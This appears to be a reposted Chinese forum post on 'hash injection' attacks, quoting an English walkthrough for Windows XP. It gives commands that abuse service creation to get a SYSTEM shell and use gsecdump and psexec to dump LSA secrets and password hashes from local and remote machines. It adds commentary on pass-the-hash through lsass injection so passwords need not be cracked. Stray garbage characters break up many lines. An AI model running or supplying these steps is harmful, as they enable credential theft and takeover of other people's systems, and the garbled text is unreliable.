HASH注入式攻击

admin

o get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
4 Z/ g% Y9 D9 y* ^0 ~& c' k* V[SC] CreateService SUCCESS
( c' R/ C- P, {8 W7 t: Q
C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
0 p+ [+ c' D$ q& K
5 N5 Z+ W  R# ]5 U3 Y6 G' f+ dThe service did not respond to the start or control request in a timely fashion.

. _! B0 v2 g/ M3 aC:\>sc delete shellcmdline
) Q! x9 g2 r( I0 d0 E[SC] DeleteService SUCCESS

* V4 o4 G; x" W0 `  \------------

Then in the new DOS window:

1 o0 Y3 p5 Q+ Y- h2 NMicrosoft Windows XP [Version 5.1.2600]
8 u* V0 N, M& g3 {3 B: R(C) Copyright 1985-2001 Microsoft Corp.
* S8 Y8 x* z2 m' ?& q
2 s. N; K/ t8 fC:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
1 p6 p' s' ]0 u# b9 ]* n& m4 @
- X! O; `% x* N7 T, Q: S& XC:\WINDOWS\system32>gsecdump -h
4 O7 `/ Z1 J; a7 C1 Dgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
, `) W1 L9 B4 B+ f& [# musage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
$ y% }, ]1 O. H4 l-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
7 g- ^& m, j) O+ c2 F; M. qCopyright (C) 2001-2007 Mark Russinovich
. [5 B/ o3 S! USysinternals - 链接标记[url]www.sysinternals.com[/url]
$ Z/ R: v* N3 Y; X0 D
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
2 j. [- }+ h, }" l( n' M
2 K1 D0 X. D' N5 d/ Xto get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
8 t1 [9 r& @4 R4 o/ t0 s# G9 y原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
& Z) \- ], j* ]) d2 y. ~9 E  @9 M
5 U( V; [1 b3 r我看了下原文出处，貌似是/2007/03/16/郁闷啊，差距。